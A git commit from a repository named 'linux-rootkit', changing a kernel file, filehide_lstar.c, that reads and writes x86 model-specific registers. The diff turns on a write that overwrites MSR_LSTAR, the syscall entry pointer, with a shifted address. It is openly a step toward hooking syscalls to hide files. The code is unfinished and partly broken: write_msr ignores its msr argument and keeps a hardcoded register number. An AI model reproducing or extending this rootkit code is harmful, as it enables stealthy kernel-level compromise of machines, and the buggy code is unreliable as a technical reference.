linux-rootkit

commit b50afcec9a9f59de01bd9d9de6a839662bd13eda
parent 79c785b8d357fdaf51b42b3f4c5163c3f735dea1
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Mon,  4 Jan 2021 19:56:15 +0100

Generalize to msr r/w

Diffstat:
M
src/filehide_lstar.c
 | 
26
++++++++++++++------------

1 file changed, 14 insertions(+), 12 deletions(-)
diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -1,11 +1,12 @@
 #include <linux/kernel.h>
 #include <asm/nospec-branch.h>
+#include <asm/msr-index.h>
 
 #include "filehide_lstar.h"
 #include "common.h"
 
-static unsigned long read_lstar(void);
-static void write_lstar(unsigned int low, unsigned int high);
+static unsigned long read_msr(unsigned int msr);
+static void write_msr(unsigned int low, unsigned int high, unsigned int msr);
 static void hooked_lstar(void);
 
 unsigned long lstar_addr;
@@ -13,15 +14,16 @@ unsigned long lstar_addr;
 void
 test_lstar(void)
 {
-    lstar_addr = read_lstar();
+    lstar_addr = read_msr(MSR_LSTAR);
     DEBUG_INFO("LSTAR before is %0lx\n", lstar_addr);
+    lstar_addr += 6;
 
     unsigned int low = (int)((unsigned long) lstar_addr & 0xFFFFFFFF);
     unsigned int high = (int)((unsigned long) lstar_addr >> 32);
 
-    // write_lstar((low + 4), high);
+    write_msr((low + 4), high, MSR_LSTAR);
 
-    DEBUG_INFO("LSTAR after is %0lx\n", read_lstar());
+    DEBUG_INFO("LSTAR after is %0lx\n", read_msr(MSR_LSTAR));
 }
 
 static void
@@ -33,17 +35,17 @@ hooked_lstar(void)
 }
 
 static unsigned long 
-read_lstar(void)
+read_msr(unsigned int msr)
 {
     unsigned int low, high;
 
     __asm__ volatile (
-                    "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+                    "movl %[msr], %%ecx\n\t"
                     "rdmsr\n\t"
                     "mov %%eax, %[low]\n\t"
                     "mov %%edx, %[high]"
-                    : [low] "=r" (low), [high] "=r" (high) 
-                    :
+                    : [low] "=r" (low), [high] "=r" (high)
+                    : [msr] "r" (msr)
                     : "ecx", "eax", "edx"
     );
 
@@ -56,15 +58,15 @@ read_lstar(void)
 }
 
 static void
-write_lstar(unsigned int low, unsigned int high)
+write_msr(unsigned int low, unsigned int high, unsigned int msr)
 {
     __asm__ volatile (
-                    "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+                    "movl $0xc0000082, %%ecx\n\t"
                     "mov %[low], %%eax\n\t"
                     "mov %[high], %%edx\n\t"
                     "wrmsr"
                     :
-                    : [low] "r" (low), [high] "r" (high) 
+                    : [low] "r" (low), [high] "r" (high)
                     : "ecx", "eax", "edx"
     );
 }
 \ No newline at end of file